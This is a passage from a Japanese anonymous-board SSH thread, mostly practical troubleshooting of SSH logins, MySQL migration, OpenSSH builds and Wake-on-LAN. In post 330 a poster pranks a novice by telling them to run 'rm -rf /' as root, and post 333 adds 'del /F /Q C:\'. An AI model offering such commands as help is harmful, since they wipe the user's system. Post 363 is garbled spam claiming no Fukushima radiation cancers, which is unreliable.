debug3: send_pubkey_test

262名無しさん@お腹いっぱい。2015/06/06(土) 13:05:16.38
debug2: we sent a publickey packet, wait for reply
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug1: Trying private key: /root/.ssh/id_dsa
debug3: no such identity: /root/.ssh/id_dsa
debug2: we did not send a packet, disable method
debug3: authmethod_lookup keyboard-interactive
debug3: remaining preferred: password
debug3: authmethod_is_enabled keyboard-interactive
debug1: Next authentication method: keyboard-interactive
debug2: userauth_kbdint
debug2: we sent a keyboard-interactive packet, wait for reply
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug3: userauth_kbdint: disable: no info_req_seen
debug2: we did not send a packet, disable method

263名無しさん@お腹いっぱい。2015/06/06(土) 13:07:12.09
debug3: authmethod_lookup password
debug3: remaining preferred:
debug3: authmethod_is_enabled password
debug1: Next authentication method: password
redadmin@192.168.1.20's password:
debug3: packet_send2: adding 48 (len 61 padlen 19 extra_pad 64)
debug2: we sent a password packet, wait for reply
debug1: Authentications that can continue: publickey,password,keyboard-interactive
Permission denied, please try again.
redadmin@192.168.1.20's password:
debug3: packet_send2: adding 48 (len 61 padlen 19 extra_pad 64)
debug2: we sent a password packet, wait for reply
Connection closed by 192.168.1.20

以上です

264名無しさん@お腹いっぱい。2015/06/06(土) 14:52:34.47
これまで旧筐体にログインしたことはないそうだけど、
(Q1)旧筐体のredadminのパスワードは分かっているのか?

debug1: Next authentication method: password
redadmin@192.168.1.20's password:
debug3: packet_send2: adding 48 (len 61 padlen 19 extra_pad 64)
debug2: we sent a password packet, wait for reply
debug1: Authentications that can continue: publickey,password,keyboard-interactive
Permission denied, please try again.
redadmin@192.168.1.20's password:
パスワードが違っているのでは?

(Q2)旧筐体にどうやってデータをアップロードしていたのか?
FTPやWebDAVなどを使っていたのなら、新筐体からポートフォワードでデータをダウンロードできるかも。

265名無しさん@お腹いっぱい。2015/06/06(土) 16:33:59.03
>>264
本当にありがとうございます。
パスワード以外の可能性はなさそうですか?

(Q2)
これまで普通に使用していたサーバーが攻撃を受けて、ネットワークから隔離されてしまったんです。
戻す事はセキュリティ上出来ないから、筐体変更が必要と言われました。
それで新筐体を用意してもらったところ、旧筐体→新筐体へのデータ移行はサポート外と言われました。

(Q1)
昨日電話で問い合わせた時は、新筐体と同じと言われましたが、怪しいです。
旧筐体のローカルIPも後日訂正されましたし。
1日1項目しか進ませてくれませんw

因みに昨日の進歩は「iptables設定解除」でした。
これでパスワードが訊かれる所まで辿り着けました。

週末は休みなので、運が良ければ月曜の夜にパスワードを教えて頂けるかもしれません。

266名無しさん@お腹いっぱい。2015/06/06(土) 18:25:09.33
>>265
(Q2)旧筐体にどうやってデータをアップロードしていたのか?
というのは、普通に使用していたという、その内容を聞いています。
例えばWordPressならWordPressの機能を使ってデータをダウンロードできるのではないですか?
新筐体でSSHが使えるのなら、ポートフォワード機能を使って旧筐体のWordPressにアクセスできる可能性があります。

267名無しさん@お腹いっぱい。2015/06/06(土) 19:29:15.51
>>266
FTPです。
WordPressは使ってないです。

ポートフォワード機能というのはパスワードなしでアクセス出来るんですか?

268名無しさん@お腹いっぱい。2015/06/06(土) 20:44:13.35
>>267
旧筐体にSSHでログインするのは難しそうなので、データを取り出すために
他の方法で入れないかということです。
FTPを使っていたのなら、新筐体で
ftp 旧筐体のIP
とやってみたらどうでしょうか。
FTPでログインできるかもしれません。

ポートフォワードはSSHの機能で、手元のPCからは新筐体にアクセスし、
新筐体のSSHDが、そのアクセスを別のサーバー(今の場合は旧筐体)へ
中継してアクセスするものです。
旧筐体で使っていたのがWebアプリなら、この方法で手元のPCから
旧筐体にアクセスできるかも、と考えたのです。

269名無しさん@お腹いっぱい。2015/06/06(土) 23:06:48.59
>>268
ありがとうございます

ですが、その前に旧筐体にSSH接続する事が出来ました
ただ、ディレクトリが見つけられません

270名無しさん@お腹いっぱい。2015/06/07(日) 03:14:56.19
お陰様でファイルの移行は無事出来ました。

しかし肝心のmysqlが接続出来ません。。

271名無しさん@お腹いっぱい。2015/06/07(日) 05:41:52.90
>>270
おまえさmysqlがどうこう言う前にみんなに説明することがあるだろ
どうして今まではsshで接続できなかったのか

272名無しさん@お腹いっぱい。2015/06/07(日) 07:22:18.88
sshで入れるならmysqldumpすりゃ良いんだろ

273名無しさん@お腹いっぱい。2015/06/07(日) 13:10:39.18
>>270
dbのディレクトリごとtar ballにしてもってきちゃいなよ
そうしたら、手元のマシンでいくらでもできると思うけど

274名無しさん@お腹いっぱい。2015/06/07(日) 16:40:43.34
もうスレ違い

275名無しさん@お腹いっぱい。2015/06/07(日) 17:14:18.66
>>271
失礼しました
旧筐体のパスワードが分かった為です

>>272
どうしてもエラーが出てしまいます

ERROR 1045 (28000): Access denied for user '*****'@'localhost' (using password: YES)

276名無しさん@お腹いっぱい。2015/06/07(日) 17:46:36.57
おまえら優しすぎ

277名無しさん@お腹いっぱい。2015/06/07(日) 18:10:55.42
sshの話じゃないだろ
よそでやれよ

278名無しさん@お腹いっぱい。2015/06/08(月) 08:03:56.92
>>275
そのdbとwebアプリケーションで動いていたのなら、それこそmysqlのdbディレクトリを、まんま新筐体に持って行けば動くだろ?
mysqlのバージョンを合わせりゃこれでも動くぞ

279名無しさん@お腹いっぱい。2015/06/08(月) 09:31:20.71
それは、mysqlのファイルにリードパーミッションが無けりゃ出来ない。

280名無しさん@お腹いっぱい。2015/06/08(月) 15:41:30.92
>>273
mysqlディレクト毎をtar.gz圧縮して、新筐体に送信、展開したらPLESK毎動かなくなってしまいました


ERROR: PleskMainDBException
MySQL query failed: Unknown column 'ip_dual_stack' in 'field list'

0: common_func.php3:220
db_query(string 'SELECT login, type, ip_address, ip_dual_stack FROM sessions WHERE sess_id=""')
1: class.Session.php:420
Session->init(string '*.*.*.*')
2: auth.php3:197

281名無しさん@お腹いっぱい。2015/06/08(月) 16:27:07.75
なぜ稼働中のサーバー(だよな?)でやったのか

282名無しさん@お腹いっぱい。2015/06/08(月) 17:07:13.47
>>280
そういうのはMySQLを止めてやるんだ

283名無しさん@お腹いっぱい。2015/06/08(月) 17:31:26.02
ワロタww

284名無しさん@お腹いっぱい。2015/06/08(月) 17:36:25.99
>>281-283
稼働中のサーバーでやってしまいました(´Д⊂ モウダメポ

しかもMySQLのバージョンが違ったかもしれません
PLESKのバージョンも違うので

これはサーバー会社に頼んで再インストールしかないですかね?

285名無しさん@お腹いっぱい。2015/06/08(月) 20:27:04.51
サーバー会社も災難だな
このスレにも災難だが

286名無しさん@お腹いっぱい。2015/06/09(火) 19:13:39.75
>>284
新筐体のディレクトリはバックアップしてなかったのかよ...

287名無しさん@お腹いっぱい。2015/09/20(日) 21:08:00.32
SSHとSSLの違いを教えて下さい。

288名無しさん@お腹いっぱい。2015/09/22(火) 08:42:06.45
SSレジスタの上位バイトと下位バイト

289名無しさん@お腹いっぱい。2015/09/22(火) 09:51:04.82
OpenSSHとOpenSSL
作者が同じと思っていたが実は違うのだ。

290名無しさん@お腹いっぱい。2015/09/24(木) 19:52:10.60
sshでクライアントからログイン出来るPCを制限しようとして
etc/ssh/sshd_configに次の一行を付け加えました
ListenAddress 192.168.1.100
そうしたら192.168.1.100からsshで接続できなくなりました
OS: FreeBSD9.2

/var/log/messagesの内容は
error: Bind to port 22 on 192.168.1.100 failed: Can't assign requested address.
fatal: Cannot bind any address.

何が原因でしょうか、よろしくお願いします

291名無しさん@お腹いっぱい。2015/09/24(木) 20:30:08.37
Listenの意味を勘違いしてるw

292名無しさん@お腹いっぱい。2015/09/26(土) 20:15:26.90
自己解決、ていうか・・・

ListenAddressを設定するのは
NICが複数有るような場合、どのNICで待ち受けるか、ですね
それをクライアントのIPにしたら、接続できないのはあたりまえでした

お騒がせしました、消えます

293名無しさん@お腹いっぱい。2015/10/22(木) 22:52:49.54
☆ 日本の核武装は早急に必須ですわ。☆
総務省の『憲法改正国民投票法』、でググってみてください。
日本国民の皆様方、2016年7月の『第24回 参議院選挙』で、日本人の悲願である
改憲の成就が決まります。皆様方、必ず投票に自ら足を運んでください。お願い致します。

294名無しさん@お腹いっぱい。2016/01/05(火) 20:08:45.92
sshはDebianだから入ってるみたいだけどどうやって練習すんの?
ここで聞いちゃダメだったら言ってくれ

295名無しさん@お腹いっぱい。2016/01/05(火) 21:08:37.50
>>294
どういう意味?

296名無しさん@お腹いっぱい。2016/01/05(火) 23:45:18.40
>>295
PCが1台しかないのにsshの練習ってどうやるのかなって思ってるだけ

297名無しさん@お腹いっぱい。2016/01/06(水) 08:40:07.72
自分のマシンにログインするとか、
仮想マシン立てるとか、
レンタルサーバ借りるとか

298名無しさん@お腹いっぱい。2016/01/06(水) 09:08:57.03
>>297
ありがとう 練習してみます

299名無しさん@お腹いっぱい。2016/01/06(水) 09:42:32.20
練習なんているかな
必要になったらおぼえればいいんじゃね

300名無しさん@お腹いっぱい。2016/01/17(日) 13:19:59.91
スマホにSSHクライアントをインストールしてLTEだと正しく接続できたのですが
wifi経由だと"Connection reset by peer"というエラーが出て接続できませんでした。
恐らくルータの設定に問題があると思うのですが、
どの辺をいじればいいのか何かキーワード的なものがありましたら教えてください。

301名無しさん@お腹いっぱい。2016/01/17(日) 14:06:14.03
すいません。
普通にポート開放したら行けました。

302名無しさん@お腹いっぱい。2016/01/29(金) 11:43:14.17
すごく初歩的な質問で申し訳ないのですが
sshで遠隔のLinuxマシン上でプログラムを実行したいと思っています。
プログラムの内容はWebを監視しながら常に最新のデータで
ファイルを上書きしていくというものですが、、、

ssh -l root xxx.xxx.xxx.xxx
cd ~/program/
./check

みたいな感じでプログラムを走らせることは出来るのですが
その後はプログラムを走らせた状態でssh通信を終わらせたいのです。

今のところ
Ctrl+cでプログラムを終わらせてexitでssh通信を終わらせてるのですが、
どういう風にすればプログラムを起動させたままsshを終了できるのでしょうか。

また、更にその後、プログラムを止めたいと思ったときに、
再度sshでログインして、実行中のプログラムを止めるみたいなことも可能なのでしょうか?

linuxはyocktです。最近Intelのedisonを買ってみて
初めてlinuxのCUIを触ったもので全然勝手が分かっておらず・・・

303名無しさん@お腹いっぱい。2016/01/29(金) 12:01:20.91
screen

LinuxならLinux板で聞きなよ

304名無しさん@お腹いっぱい。2016/01/29(金) 17:28:34.20
ありがとうございます!
まさにそれが知りたかったです

SSHでスレタイ検索したのでUNIX板に来てしまったようです
失礼しました

305名無しさん@お腹いっぱい。2016/02/01(月) 03:30:09.46


306名無しさん@お腹いっぱい。2016/04/22(金) 08:34:58.21
初歩的な質問なのですが
一台のマシンから複数のマシンに
鍵認証させるにはどうしたらいいのですか?

307名無しさん@お腹いっぱい。2016/04/22(金) 08:50:01.64
複数のマシンに公開鍵置くだけ

308名無しさん@お腹いっぱい。2016/04/22(金) 09:09:29.01
最初は使い方が良く分からなくて
鍵をサーバ側で作っていた時期もあったよ
おおらかな時代だったわ

309名無しさん@お腹いっぱい。2016/04/22(金) 10:28:46.61
>>307
それが上手くいけまんでした
詳しお願いいたします

310名無しさん@お腹いっぱい。2016/04/22(金) 11:41:47.77
>>309
"-v"つけて冗長出力を確認する
エスパーすると、パーミションの問題な気がするけど

311名無しさん@お腹いっぱい。2016/04/22(金) 12:04:19.34
公開鍵認証とCA(自前の認証局)でユーザー認証とかってやったことある人いる?

312名無しさん@お腹いっぱい。2016/04/22(金) 14:12:48.81
sshのフォントってどうやって変更できますか?
bashじゃないですよ

313名無しさん@お腹いっぱい。2016/04/22(金) 14:39:02.43
>>312
sshでもなんでも、それ自体にフォントなんて無い。
sshの「何の」フォントを変更したいんだよ。

314名無しさん@お腹いっぱい。2016/04/22(金) 15:21:18.26
sshの画面のフォントです

315名無しさん@お腹いっぱい。2016/04/22(金) 16:42:26.02
sshの「何の」画面のフォントを変更したいんだよ。

316名無しさん@お腹いっぱい。2016/04/22(金) 17:11:49.06
テラタームだ!

317名無しさん@お腹いっぱい。2016/04/22(金) 17:36:29.56
テラタームならメニューの設定の中にフォントがあるで

318名無しさん@お腹いっぱい。2016/04/22(金) 18:15:20.09
設定でフォントを変更しても豆腐になります><

319名無しさん@お腹いっぱい。2016/04/22(金) 18:24:59.54
そうかーまあssh関係ないから勝手にがんばれ

320名無しさん@お腹いっぱい。2016/04/22(金) 18:48:37.46
>>315
液晶の画面です

321名無しさん@お腹いっぱい。2016/04/22(金) 19:05:18.52
sshの「何の」液晶の画面のフォントを変更したいんだよ。

322名無しさん@お腹いっぱい。2016/04/22(金) 19:12:23.61
液晶?ほんとに?
フォントに〜?

323名無しさん@お腹いっぱい。2016/04/22(金) 20:47:37.18
カラー液晶です

324名無しさん@お腹いっぱい。2016/04/22(金) 21:05:20.83
sshはカラー液晶には対応してません。

325名無しさん@お腹いっぱい。2016/04/23(土) 13:10:25.89
端末側じゃなくてサーバー側のロケーィルとか文字クォードの問題かもしぬ。

問1.そのカラー液晶の画面とやらにつながっているコンピューターのOSが何か答えよ。
問2.そのコンピューターで日本語が表示されるかどうか答えよ。
問3.使用しているSSH端末エミュレーターの名称を答えよ。
問4.SSHでログインしているサーバーのOSが何か答えよ。
問5.SSHでログインしているサーバーのロケールを答えよ。
問6.おぬしにSSHを使えと言った奴が誰か答えよ。

326名無しさん@お腹いっぱい。2016/04/23(土) 17:05:26.03
問1.NECです
問2.ケースを開ける時は電源プラグをコンセントから抜いてくださいと表示があります
問3.エミューレーターではありません 実物マシンです
問4.サーバーではありません
問5.サーバーじゃないのでわかりません
問6.シェルが使いたかっただけです

327名無しさん@お腹いっぱい。2016/04/23(土) 17:39:16.00
>>326
よく聞け、新兵。これからお前が口からクソを吐く、その前と後ろにサーを付けろ。

NECなどというOSは存在しない。OSというはウィンドウズテンとかOSテンとかウブンツとかそういうものだ。
今から貴様のOSはNECではなくウィンドウズテンだ。もし違っているなら今すぐウィンドウズテンにするんだ。
次はターミナルだ。お前が使用しているのはテラタームだな。もし違っているなら今すぐテラタームをダウンロードしてインストールするんだ。

ここまでは出来ているんだろうな。よし、さっさとログインしてみろ。ユーザー名とパスワードを入力したな。
公開鍵を使用していないとしても、それはここでは大目に見てやろう。ただし今回だけだ。

uname -a
と入力してみろ。最後にエンターキーを押すのを忘れるな。
これでシェルが使えているのが分かっただろう。
何が問題か言ってみろ。

328名無しさん@お腹いっぱい。2016/04/23(土) 22:02:52.86
'uname'は、内部コマンドまたは外部コマンド、
操作可能なプログラムまたはバッチ ファイルとして認識されていません。

329名無しさん@お腹いっぱい。2016/04/23(土) 22:25:35.30
ドスプロンプトキタワーーーーー

330名無しさん@お腹いっぱい。2016/04/24(日) 12:11:37.08
>>326
#のあとに、rm -rf /とタイプして"ENTER"キー押したらシェルが体験できるよ。

331名無しさん@お腹いっぱい。2016/04/24(日) 12:14:51.75
'rm'は、内部コマンドまたは外部コマンド、
操作可能なプログラムまたはバッチ ファイルとして認識されていません。

332名無しさん@お腹いっぱい。2016/04/24(日) 12:17:04.65
ドスプロンプトサイキョウーーーーー!

333名無しさん@お腹いっぱい。2016/04/24(日) 16:43:01.75
del /F /Q C:\

334名無しさん@お腹いっぱい。2016/04/24(日) 17:40:39.15
bash: del: コマンドが見つかりません

335名無しさん@お腹いっぱい。2016/04/26(火) 21:07:40.75
コマンド窓だろ(´・ω・`)

336名無しさん@お腹いっぱい。2016/04/27(水) 14:27:46.62
ログイン先がWindowsなのかニャ?

337名無しさん@お腹いっぱい。2016/04/27(水) 20:35:36.59
ファイルをコピーするにはどうすればいいんでしょうか?
cpというプロンプトを使えと教えられたんですが、
やってみたら同じようなファイルが2つできただけで、
コピーはとれませんでした。

ちなみにログインシエルはSSHです。

338名無しさん@お腹いっぱい。2016/04/27(水) 20:37:15.06
まず服を脱ぎます

339名無しさん@お腹いっぱい。2016/04/29(金) 14:43:02.56
>>337
同じファイルが二つできたらそれはコピーだろう

340名無しさん@お腹いっぱい。2016/04/29(金) 15:34:37.99
>>339
画面コピーのことだろ
読解力ないやつだな
もっと行間読めよ

341名無しさん@お腹いっぱい。2016/04/30(土) 02:05:36.16
>>340
ファイルって書いてあるんですよねぇ。
コピーって印刷するってことかと思ったわ

342名無しさん@お腹いっぱい。2016/05/01(日) 13:27:33.14
>>337
コンビニでファイル(紙)をコピーする。白黒なら一枚10円。

343名無しさん@お腹いっぱい。2016/05/01(日) 13:37:46.43
コピーの意味がわからないとか、久しぶりに本物を見た気がする

344名無しさん@お腹いっぱい。2016/05/01(日) 13:46:59.20
>>337
馬鹿だな。
今時、ゼロックスできないとかw

345名無しさん@お腹いっぱい。2016/05/01(日) 14:01:15.91
昭和ホイホイのお時間です

346名無しさん@お腹いっぱい。2016/05/01(日) 20:51:52.10
ファイルを移動するにはどうすればいいんでしょうか?
mvというプロンプトを使えと教えられたんですが、
やってみたらファイルの名称が変わっただけで、
ファイルは職場のパソコンの中のまま移動しませんでした。

ちなみにログインシエルはSSHです。

347名無しさん@お腹いっぱい。2016/05/02(月) 11:37:22.75
>>346
そもそも mv を使ってファイル名が変わったということは
きちんとコマンド入力して 移動先 を指定したということで
その結果パソコンの中のままとかそういう表現はしない

ネタとしても3番煎じだし、適切な改行もマイナスポイント
素人のまねをしようとしても まともさはにじみ出てしまう
もっと狂気に身を委ねる必要があります

348名無しさん@お腹いっぱい。2016/05/02(月) 12:35:03.25
>>346
省略語は嫌いだ。それは電子ファイル。電子ファイルとファイルは違う。
ファイルと言ったらコクヨに綴じたやつのこと。勝手に電子を省略しないように。

349名無しさん@お腹いっぱい。2016/05/02(月) 12:37:31.50
電子ファイルなんて言葉ないんですが

350名無しさん@お腹いっぱい。2016/05/02(月) 13:40:16.32
>>348
電子ファイルって何?

351名無しさん@お腹いっぱい。2016/05/02(月) 15:17:58.34
>>348
いいぞ! その調子だ!

352名無しさん@お腹いっぱい。2016/05/06(金) 03:27:54.12
ゆとりは文脈で判断できないから略せない

353名無しさん@お腹いっぱい。2016/05/06(金) 03:30:03.32
レベル低いなSSH以前にコマンド板逝けよw

354名無しさん@お腹いっぱい。2016/05/06(金) 09:04:19.98
>>353
そんな筋肉モリモリマッチョマンの変態板があるの?

355名無しさん@お腹いっぱい。2016/05/06(金) 16:41:29.39
それはセクシーコマンドー板

356名無しさん@お腹いっぱい。2016/05/06(金) 18:27:13.36
電子ファイルを電子コピーするにはどうすればいいんでしょうか?
電子cpという電子プロンプトを使えと教えられたんですが、
やってみたら同じような電子ファイルが2つできただけで、
電子コピーはとれませんでした。

ちなみに電子ログインシエルは電子SSHです。

357名無しさん@お腹いっぱい。2016/05/07(土) 01:16:10.29
SSH板行けよ

358名無しさん@お腹いっぱい。2016/05/07(土) 10:18:33.43
こいつ、面白いと思ってんのかな?

359名無しさん@お腹いっぱい。2016/05/12(木) 11:09:57.63
SSHの暗号鍵を作成するとき、
RSAなんちゃらという表示と共に
○や・の落書きみたいな図が表示されますが、
それを生成するツールってなんでしょうか?
単独で使いたいので、手がかりだけでも
教えていただけるとありがたいです。

360名無しさん@お腹いっぱい。2016/05/12(木) 11:39:07.97
>>359
printf じゃない?

361名無しさん@お腹いっぱい。2016/05/12(木) 11:44:37.23
すみませんが詳しい方のみ回答をお願いします

3623592016/05/12(木) 19:43:13.56
自己解決しました。アレはrandomart imageと呼ばれるものでした。
で、ツールはココ。

http://askubuntu.com/questions/602068/how-to-generate-randomart-of-anyfile

363名無しさん@お腹いっぱい。2016/05/29(日) 16:23:50.28
                   「ホテル 放射能」 を建設しようかと、考え始めています。

         また、私たちの愚かな「放射能コワイ、コワイ」派の敵どもが、ギャーギャー騒ぐでしょう。
   本当に、この愚か者たちは、自分の脳に張り付いた放射能恐怖症で、救いようのない者たちだと、思います。

       10年後に死ぬ、おそらくそのうちの多くは、子供たちだと、この馬鹿たちは、信じ込んでいる。
  私は、呆(あき)れかえる。福島では、誰も死なない。発病して死ぬ者はひとりもいない。そのように断言します。

私の同志は、山下俊一(やましたしゅんいち)長崎大学教授 (現在は、福島県立医大副学長も兼任している) である。 
山下教授らに、バッシングの嵐を浴びせた者たちは、ずるい逃げ方をするな。「私は、そんなことは言わなかったよ」と言うな。

福島で放射能にせいで癌になる(放射能による癌は甲状腺がんだけである)人はひとりも出ない、という専門医学者の高田純の表明を私は尊重する。 
専門家でもなく、放射能の人体への影響について、素人と同じくせに、偉そうに発言する者たちを、私たちは、厳しく排撃しなければならない。[1792]

どっちが福島の人間たちに対して、犯罪的か。「福島に近寄ってはいけない」と、実名で書いた者たちを、私たちは、記憶していなければいけない。
   私、副島隆彦が今も不愉快なのは、学問道場の会員を止(や)めた人が、1000人ぐらい出たことだ。[1879]

      「今も会員でいる人たちには、その人間としての余裕がある。]会員に求められる資質はこれである。
      道場を退会した者たちは、まず自らの信念とは何かについて真剣に考えなければならない。[1880]



山下(俊一)先生が『汚染されたものを食べても大丈夫』とテレビで発表した後、
チェルノブイリで活動していたグループが山下先生に電話をしたら『立場上仕方がなかった』と答えた。
「山下(俊一)先生は ベラルーシbフ状況を全部知bチています。そbオてその情報を荘S部秘密にしてb「るんです。 だから秘密保全法なんです」――。
https://twitter.com/neko_aii/status/735476420361605120

364名無しさん@お腹いっぱい。2016/07/13(水) 21:20:29.88
ずいぶん長い間ほったらかしだったPoderosaが有償化して戻ってきてるぞ!
試用は無期限にできると言うが...
https://ja.poderosa-terminal.com/

365名無しさん@お腹いっぱい。2016/07/14(木) 12:17:06.42
さすがにその使用条件ではインストールして使ってみる気にもならない

366名無しさん@お腹いっぱい。2016/07/14(木) 12:31:21.24
だからteratermで十分なのだよ

367名無しさん@お腹いっぱい。2016/07/15(金) 00:52:49.81
ぼくは mintty ちゃん!

Windows10のコマンドプロンプトがちょっとマシになったそうだけどどうなの?

368名無しさん@お腹いっぱい。2016/07/16(土) 22:14:22.36
スレ違い

369名無しさん@お腹いっぱい。2016/07/25(月) 10:41:14.80
ではUbuntu on Windowsを有効にすると"Windows側に"sshサーバーがインストールされる話でもしようか

370名無しさん@お腹いっぱい。2016/09/05(月) 17:15:14.99
>>369
続きはまだぁ?

371名無しさん@お腹いっぱい。2016/09/25(日) 18:35:23.03
dropbearの話もここでいいの?
普段使いしてる人あんまいないかもだけど

372名無しさん@お腹いっぱい。2016/09/29(木) 23:55:07.98
俺はiterm2

373名無しさん@お腹いっぱい。2016/10/01(土) 12:44:56.18
31-168-172-143.telavivwifi.com とか
static-82-85-187-101.clienti.tiscali.it とか
bl20-203-6.dsl.telepac.pt とか
最近逆引きできる IP アドレスから突撃してくる奴が多いなぁ

374名無しさん@お腹いっぱい。2016/10/01(土) 19:59:49.47
ただのbotnetやろ…

375名無しさん@お腹いっぱい。2016/10/09(日) 10:56:58.62
dropbearのサーバーはOpenSSHにくらべて少し軽い気がする。
非力なマシンで使うと。
暗号負荷はそんな変わんないはずだから余計な前処理してないのかね

376名無しさん@お腹いっぱい。2016/10/15(土) 13:37:35.83
Rlogin、上の方で言われていたフォント設定が面倒な点も改善されてて
単一軽量exeファイルで動作するとてもよいクライアントだと思う

ただ普通にシェル叩いてるぶんにはいいんだけど
midnight comander使うと枠線がうまく表示されない
設定いじればいいのかなぁ

377名無しさん@お腹いっぱい。2016/11/03(木) 19:01:26.82
トリビア:OpenSSH 7.3p1 は OpenSSL 1.1.0b と組み合わせられない。1.0.x系のみ

誰かやってるはずだと思いながら自分で1.1.0対応パッチ書いて、
あとでやっぱ似たようなものがあると知ったorz
のだが、完成度では自分の書いたものが一番のようだ

378名無しさん@お腹いっぱい。2016/11/03(木) 19:03:42.42
大本のOpenBSDでは OpenSSL 1.0.3からforkした LibreSSL を使っているので
影響は受けないというか見捨てられている。
今後どうするのかは各所様子見みたいね。

379名無しさん@お腹いっぱい。2016/11/18(金) 08:47:06.12
1.0.1gからのフォークだね。

OpenSSHのMLでOpenSSL1.1.0サポートどうするよってなってるけど、結論出てないね。
抽象レイヤー独自で作るかなんてnode.jsも言ってたようなこと言ってたり。
http://marc.info/?t=147422463900001&r=1&w=2

380名無しさん@お腹いっぱい。2016/12/02(金) 08:51:47.45
どうするんだろね(´・ω・`)

381名無しさん@お腹いっぱい。2016/12/20(火) 12:32:01.69
7.4

382名無しさん@お腹いっぱい。2016/12/21(水) 19:11:10.97
INSTALL

OpenSSL 1.1.x is not currently supported.

C89でもなんとかコンパイルできるのがまだ救いだ俺的には

383名無しさん@お腹いっぱい。2016/12/24(土) 10:28:34.71
OpenSSH 7.4p1 の OpenSSL 1.1.0c 対応パッチ作成完了。
テストも通る。

test_utf8だけ通らないが漏れんとこのwcwidth()が腐ってるせいなので
どうにもならん。放置。問題ないだろたぶん

384名無しさん@お腹いっぱい。2017/03/10(金) 19:05:33.71
macOSのsshの話もここでいい?

385名無しさん@お腹いっぱい。2017/03/10(金) 19:06:34.62
OSXは中身Unixやで、というわけでおk

386名無しさん@お腹いっぱい。2017/03/10(金) 20:01:42.99
Mac板でやった方がいいんじゃね

387名無しさん@お腹いっぱい。2017/03/10(金) 22:37:24.95
Sierraのcronで他の計算機のデータをssh越しに自動でバックアップしようとして、rsyncのシェルスクリプト作ってログイン中にterminalとcronで動くことを確認した。
ところが、ユーザーがloginしていないと、なぜかkeychainに保存されてるpassphraseがcronの環境に読み込まれないので、errorになるっていう問題だけどMac板いくわ

388名無しさん@お腹いっぱい。2017/03/11(土) 02:42:43.57
>>387
そりゃログインしてなかったらkeychainは使えないだろう

389名無しさん@お腹いっぱい。2017/03/11(土) 07:26:53.80
そう言われてみるとそうですね。
ありがとうございます。

390名無しさん@お腹いっぱい。2017/03/23(木) 23:07:16.33
7.5でOpenSSL 1.0.1ではconfigure通らなくなった

391ich12017/04/01(土) 08:06:01.73
https://goo.gl/QoUujp
これは嫌だなー。。本当なの?

392名無しさん@お腹いっぱい。2017/04/04(火) 10:09:54.33
goo.gl アドレスは無条件に非表示あぼ〜んすると良いです
(99.99%がスパムなので)

393名無しさん@お腹いっぱい。2017/04/04(火) 19:51:35.81
一方俺は OpenSSL-1.1.0 対応パッチを書いて勝利
今make test中 (超時間かかる)

394名無しさん@お腹いっぱい。2017/04/05(水) 10:06:26.88
OpenSSH 7.5 のハイライトらしきもの:
・ssh-1 を本格的に捨てにかかっている。一部のコマンドは -1 を受け付けない。
・UsePrivilegeSeparationがデフォルトONになり、設定はdeprecatedになった
・鍵認証でログインするとSHAハッシュが記録されるようになった。
 あとから追っかけるときに便利そう。(前からだっけ?)
Apr 5 09:28:12 saba sshd[27182]: Accepted publickey for ore from ::1 port 49525 ssh2: RSA SHA256:UfcrUWnSiFur5ra28VQoo7HgUShQueQ5LTnoJneZ48A


頑張ってOpenSSL-1.1に移植しても、
常用してるのはdropbearだからあんま意味ないじゃんと今更思った

395名無しさん@お腹いっぱい。2017/04/05(水) 12:44:28.64
>>394
Dropbearといえばmosh 1.3.0で--no-ssh-pty optionがはいってDropbearでも使えるようになったよ
オプションつけるのめんどいけど

396名無しさん@お腹いっぱい。2017/05/06(土) 12:01:52.59
ssh-1くたばった

397名無しさん@お腹いっぱい。2017/05/12(金) 02:00:27.48
ド素人スマソ。 OpenSSH Windows版ぶっ込んだサーバーpcにスマホのクライアントアプリからwolさせるSSHコマンドてある?
ググったらether-wakeてのが出たけどこれなの?
教えてエロい人

398名無しさん@お腹いっぱい。2017/05/12(金) 06:51:49.86
スマホ用のWake On LANアプリでよくね?

399名無しさん@お腹いっぱい。2017/05/12(金) 10:09:22.52
>>398 レスサンクス。スマホのwolアプリてパケットが暗号化されてるかよくわからないのでSSHでやれたら良いなぁと思った訳です。

400名無しさん@お腹いっぱい。2017/05/12(金) 18:10:39.13
>>399
何を何のために暗号化したいの
WOLはネットワークインタフェースカードの限られた部分で処理するから暗号化なんてしてたら処理できないんじゃ

401名無しさん@お腹いっぱい。2017/05/12(金) 18:18:57.58
MACアドレスとか入ってるからじゃない?
WiFiが暗号化されてれば問題ないはずだけどね

402名無しさん@お腹いっぱい。2017/05/12(金) 19:03:49.37
>>400>>401 レス感謝!ガチなド素人なもんでホントスマン。その暗号化が必要かどうかもわかってないもんで。
もともとは使ってる某NECルーターにある「ホームipロケーション」という簡易ddns機能的な奴を使って外部からwolをしようとしたら送信画面が暗号化されてない事に気付いて、これをなんとかしようと思った訳です。
よっぽどヤマハのルーターでも買ってやろかと思ったけどSSHサーバーぶっ込むの面白そうだなとチャレンジ中。

403名無しさん@お腹いっぱい。2017/05/12(金) 21:27:07.67
>>402
外部とルータ間の通信の暗号化は必要かもしれない
誰かが認証を盗聴したら同じことができてしまうからね

もしsshで接続できたとしたら、そのPCは起動しているだろうからWOLは不要

wake on lanはその名の通りLANで使うもの
同一ネットワーク内の全ての端末に簡単な通信パケットを送って各自がそれを見て自分宛だったら起動する
基本的には他のネットワークからは起動できない
だからルータにその機能がよくついている

外部端末とルータ間の通信の暗号化をお勧めする
またはVPNとか

404名無しさん@お腹いっぱい。2017/05/12(金) 22:03:21.63
>>403 エスパー発見!ありがとうございます。聞きたい事が全て先回りで答えが出てる感じ。やっぱVPNか。最初はpcをvpnサーバにしようかと思ってたところノーパソサーバ化&常時起動は火災の元みたいなスレ見てwolの適時起動にしようかと思ったの。
お騒がせしました。壮大なスレチでスマソ。

405名無しさん@お腹いっぱい。2017/05/12(金) 22:06:55.05
>>404
VPN鯖にしたいだけならラズパイみたいなボードPCをおすすめしておく

406名無しさん@お腹いっぱい。2017/05/12(金) 22:17:36.68
>>405 ラズパイ考えてた!スペックの低い端末を鯖にした時の通信速度が心配で候補から外してた。(あと敷居が高そうで)
メガサンキュー!方向性が見えてきた。

407名無しさん@お腹いっぱい。2017/05/12(金) 22:52:24.60
>>406
余程古い環境以外は通信速度のほうがボトルネックになるからそこまで気にしなくてもいいと思うけどなー、まあ敷居が高いのは言えてるが

408名無しさん@お腹いっぱい。2017/05/13(土) 06:11:14.50
ルータにVPNないなら
常時稼働ラズパイにsshで繋いでwolでも簡単だね

